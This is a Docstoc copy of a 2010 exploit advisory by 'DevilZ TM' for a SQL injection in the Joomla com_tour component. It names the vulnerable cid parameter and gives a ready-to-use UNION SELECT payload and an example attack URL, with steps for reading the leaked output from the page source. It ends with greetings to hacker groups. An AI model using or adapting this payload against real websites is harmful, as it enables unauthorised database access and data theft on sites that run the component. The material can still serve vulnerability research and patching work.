Docstoc

Joomla Component com_tour SQL Injection Vulnerability

Document Sample
Joomla Component com_tour SQL Injection Vulnerability Powered By Docstoc
					                              Joomla Component com_tour SQL Injection Vulnerability                                        Page 1/1
  1    # Title : Joomla Component com_tour SQL Injection Vulnerability
  2    # Author: DevilZ TM
  3    # Data : 2010−04−01
  4
  5    [~]######################################### InformatioN #############################################[~]
  6
  7    [~]   Title      :   Joomla Component com_tour SQL Injection Vulnerability
  8    [~]   Author     :   DevilZ TM By D3v1l
  9    [~]   Homepage   :   http://www.DEVILZTM.com
  10   [~]   Email      :   Expl0it@DevilZTM.Com
  11   [~]   Contact    :   D3v1l.blackhat@yahoo.com
  12
  13   [~]#########################################        ExploiT     #############################################[~]
  14
  15   [~] Vulnerable File :
  16
  17   http://127.0.0.1/index.php?option=com_tour&view=cat&cid=[SQL]
  18
  19   [~] ExploiT              :
  20
  21   −999+UNION+ALL+SELECT+1,2,3,4−−
  22
  23   Now You Can See Result In Source Page :
  24
  25   Mozila : Ctrl + U
  26
  27   IE       : View − Source
  28
  29   [~] Example              :
  30
  31   http://127.0.0.1/index.php?option=com_tour&view=cat&cid=−999+UNION+ALL+SELECT+1,2,3,4−−
  32
  33
  34   [~]######################################### ThankS To ... ############################################[~]
  35
  36   [~] Special Thanks To My Best FriendS :
  37
  38   Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d−r0z AND All Iranian HackerS
  39
  40   [~] IRANIAN Young HackerZ
  41
  42   [~] GreetZ : Exploit−DB TeaM
  43
  44   [~]#########################################        FinisH :D    #############################################[~]




DevilZ TM                                                                                                                  04/01/2010

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:126
posted:5/24/2010
language:English
pages:1